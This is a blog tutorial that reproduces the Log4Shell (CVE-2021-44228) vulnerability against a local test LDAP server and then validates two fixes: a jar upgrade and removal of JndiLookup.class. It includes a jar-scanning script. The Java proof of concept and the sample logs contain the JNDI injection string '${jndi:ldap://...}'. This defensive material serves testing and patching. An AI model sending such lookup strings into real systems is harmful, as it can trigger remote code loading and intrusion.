How to reproduce CVE-2021-44228 (Log4J vulnerability), patch it, and validate the fix

Ethical Hacking: I am explaining this so that more people can understand what is going on and protect themselves.

Please do not harm others.

I thought of working on it last night, but I had three important events.

  • There was a Christmas party, and my kids brought me there.
  • The party was over at 8 PM, but Johan and I practiced piano notes for “Believer”. Since Johan has classes today, he went to bed after the practice, at 9:30.
  • But Jadon wanted me to read books and tell him stories. After reading 5 books and more than 10 stories, he finally slept. It was 12:30 when Jadon and I went to sleep.

I woke up to a nightmare at 4 and could not go back to sleep. Then I did some video editing and published my kids' Turtleback Zoo video on YouTube.

Finally, I had some time and started working on this.

In this article I discuss how to reproduce CVE-2021-44228, the Log4J vulnerability, patch it and validate the fix.

I was crafting my own JNDI LDAP server and had the JNDI part ready. The next step was integrating it with an LDAP server, so I set up OpenLDAP and was about to configure it. This was the first time I had set up an LDAP server, and I realized I was wading through the OpenLDAP docs. So I ran a Google search and found a nice LDAP server crafted specifically to test this vulnerability, which simplified my work.

Acknowledgment:

LDAP Server: Standalone

The test LDAP server can be run as a Docker container. This container sets up an LDAP server:

docker run -i -p 1389:1389 vivasaayi/jndi-ldap-test-server:0.0.1

The test LDAP server has an endpoint that returns a malicious string.

Precheck: Check if you have vulnerable Log4J jars.

You can use the code below to trigger the vulnerability against the test LDAP server.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4JExploit {
    static Logger logger = LogManager.getLogger(Log4JExploit.class);

    public static void main(String... args) {
        // Harmless lookup: resolves to the JVM version only if Log4j expands lookups
        String javaVersion = "${java:version}";
        // JNDI lookup pointing at the local test LDAP server started above
        String ldapUrl = "${jndi:ldap://localhost:1389/Test}";

        System.out.println(javaVersion); // printed literally: System.out does no lookups
        logger.error(javaVersion);       // a vulnerable Log4j logs the resolved version
        logger.error(ldapUrl);           // a vulnerable Log4j contacts the LDAP server
        System.out.println("Exiting.");
    }
}

Run that code:

# Update the directory locations accordingly

javac -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar /repo/src/Log4JExploit.java

java -classpath /repo/libs/log4j-api-2.14.1.jar:/repo/libs/log4j-core-2.14.1.jar:/repo/src Log4JExploit

It will print output like this:


${java:version}
11:24:37.666 [main] ERROR Log4JExploit - Java version 1.8.0_312
11:24:37.669 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
Exiting.

Process finished with exit code 0

Simple command to check the vulnerability

You can simply build and run the above two steps using the Docker Compose setup below.

git clone https://github.com/vivasaayi/log4jexploit.git
cd log4jexploit 
make build
make run

This is the output:

(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Starting log4jexploit_ldapserver_1 ... done
Recreating log4jexploit_localpow_1 ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:29:51Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:29:52.886 [main] ERROR Log4JExploit - Java version 1.8.0_312
ldapserver_1  | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"bind","auth_type":"simple","user":""},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Bind Request"}
ldapserver_1  | {"level":"info","component":"ldap","event":"request","client_ip":"172.22.0.3:53900","request":{"type":"search","base_dn":"Test","filter":"(objectClass=*)","attributes":[],"time_limit":0},"time":"2021-12-17T16:29:52Z","message":"Incoming LDAP Search Request"}
localpow_1    | 16:29:52.890 [main] ERROR Log4JExploit - !!! VULNERABLE !!!
localpow_1    | Exiting.

FIX 1: Update the jars

I updated the jars (log4j-api-2.16.0.jar), and they can be found in this folder: vivasaayi/log4jexploit at updated-log4j-versions (github.com)

For production use, please download the official Log4j patch release.

To validate the fix, run:


docker-compose down
git checkout updated-log4j-versions
git pull
make build
make run

Now you will not see the vulnerability:

Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:34:08Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:34:09.866 [main] ERROR Log4JExploit - ${java:version}
localpow_1    | 16:34:09.869 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1    | Exiting.
log4jexploit_localpow_1 exited with code 0

Fix 2: Remove JNDI lookup class

This is in this branch: log4jexploit/libs at repack-log4j · vivasaayi/log4jexploit (github.com)

This is the script that patches the old log4j jars. (I have already run the patch.)

cd libs

echo "Patching log4j-core-*.."
# Loop so that every matching jar is patched, even if several log4j-core versions are present
for jar in log4j-core-*.jar; do
    zip -q -d "$jar" org/apache/logging/log4j/core/lookup/JndiLookup.class
done
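For the precheck above (do you have vulnerable Log4J jars?) and for confirming that Fix 2 really removed the class, here is an added Python scanner; it is my own example, not code from the log4jexploit repository. It opens every jar under a directory, reads the Maven version from pom.properties, and reports whether JndiLookup.class is still present; the sample jars it builds are constructed fixtures, not real Log4j bytecode, and the 2.16.0 threshold follows the version used in Fix 1.

```python
import os
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 16, 0)  # the release the post upgrades to in Fix 1


def parse_version(props_text):
    """Pull (major, minor, patch) out of a pom.properties 'version=' line, or None."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", props_text, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_jar(path):
    """Classify one jar as vulnerable, patched-release, class-removed or not-log4j-core."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        # log4j-core jars ship Maven metadata with a "version=" line
        props = jar.read(POM_PROPS).decode("utf-8", "replace") if POM_PROPS in names else ""
    version = parse_version(props)
    if not any(n.startswith("org/apache/logging/log4j/core/") for n in names):
        status = "not-log4j-core"
    elif JNDI_CLASS not in names:
        status = "class-removed"    # Fix 2 on the page: class deleted with zip -d
    elif version is not None and version >= FIXED_VERSION:
        status = "patched-release"  # Fix 1 on the page: jar replaced by 2.16.0 or later
    else:
        status = "vulnerable"       # lookup class present and version below 2.16.0 (or unknown)
    return {"path": path, "version": version, "status": status}


def scan_directory(root):
    """Inspect every .jar under root, in a stable order."""
    return [inspect_jar(os.path.join(d, f)) for d, _, fs in os.walk(root)
            for f in sorted(fs) if f.endswith(".jar")]


def build_sample_jars(directory):
    """Constructed fixtures (not real Log4j bytecode), one per state the post shows."""
    for name, version, with_jndi in [("log4j-core-2.14.1.jar", "2.14.1", True),
                                     ("log4j-core-2.16.0.jar", "2.16.0", True),
                                     ("log4j-core-repacked.jar", "2.14.1", False)]:
        with zipfile.ZipFile(os.path.join(directory, name), "w") as z:
            z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            if with_jndi:
                z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return directory
```

Point scan_directory at your real libs folder to get one status line per jar; a jar whose pom.properties is missing but which still carries JndiLookup.class is reported as vulnerable rather than silently skipped.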

To validate, run:

docker-compose down
git checkout repack-log4j
git pull
make build
make run

(base) rajanp@rajanps-MBP log4jexploit % make run
docker-compose up
Creating network "log4jexploit_default" with the default driver
Creating log4jexploit_ldapserver_1 ... done
Creating log4jexploit_localpow_1   ... done
Attaching to log4jexploit_ldapserver_1, log4jexploit_localpow_1
ldapserver_1  | {"level":"info","component":"server","event":"listen","listen_address":"0.0.0.0","port":1389,"time":"2021-12-17T16:37:15Z","message":"Listening on 0.0.0.0:1389"}
localpow_1    | ${java:version}
localpow_1    | 16:37:16.797 [main] ERROR Log4JExploit - Java version 1.8.0_312
localpow_1    | 16:37:16.801 [main] ERROR Log4JExploit - ${jndi:ldap://ldapserver:1389/Test}
localpow_1    | Exiting.
log4jexploit_localpow_1 exited with code 0

Final Notes:

If you are on AWS there are other patches available. I will continue to work on them and provide updates in my blog.


Copyright © 2021 Rajan Panneer Selvam. Some of the content is derived from publicly available information. For some of the resources I have obtained commercial licenses and you cannot use them in your projects. Before reusing any of the site content, please double-check for copyright issues. I am not responsible if you are infringing copyrights.